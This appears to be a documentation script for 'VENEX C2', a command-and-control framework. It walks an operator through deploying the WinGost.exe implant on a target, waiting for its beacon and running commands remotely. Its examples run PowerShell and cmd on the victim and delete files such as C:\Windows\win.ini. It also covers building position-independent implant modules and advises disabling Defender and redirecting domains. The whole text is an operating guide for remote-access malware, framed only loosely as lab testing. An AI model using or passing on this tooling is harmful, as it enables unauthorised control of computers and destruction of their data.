# docs_detailed.vms
# More detailed documentation with examples

print ================================================
print           VENEX C2 - COMPLETE GUIDE
print ================================================

print 
print [QUICK START]
print 1. ./server.exe                    # Start C2
print 2. python client.py                # Start GUI
print 3. Deploy WinGost.exe              # On target
print 4. Wait for beacon                 # ~30 seconds
print 5. Right-click target -> Interactive

print 
print [MODULE EXAMPLES]
print tm powershell -command "Get-Process"
print tm cmd /c "dir C:\\"
print rmf "C:\Users\Public\Desktop\file.txt"
print print "Status: Active"
print $SS

print 
print [VMS SCRIPT CREATION]
print 1. Create <name>.vms in moduloScript/
print 2. Add commands line by line
print 3. Execute with .$<name>
print 
print Example script (info.vms):
print tm whoami
print tm hostname
print tm ipconfig
print rmf C:\Windows\win.ini

print 
print [CUSTOM MODULE DEVELOPMENT]
print 1. Write module.c with WinGost.h
print 2. Compile: gcc -nostdlib -nodefaultlibs
print 3. Ensure position-independent code
print 4. No .data/.rdata sections
print 5. Use ft->WinGost.gostSend() for output

print 
print [TROUBLESHOOTING]
print No target? Check WinGost is running
print Commands hang? Wait for beacon (30-60s)
print Download fails? File >5MB or locked
print No output? Check server.exe console

print 
print [OP SECURITY]
print Use isolated lab (no internet)
print Modify hosts file for domain redirect
print Disable Defender in test VM
print Take VM snapshots before tests

print 
print ================================================
print        DOCUMENTATION GENERATED BY PRINT MODULE
print ================================================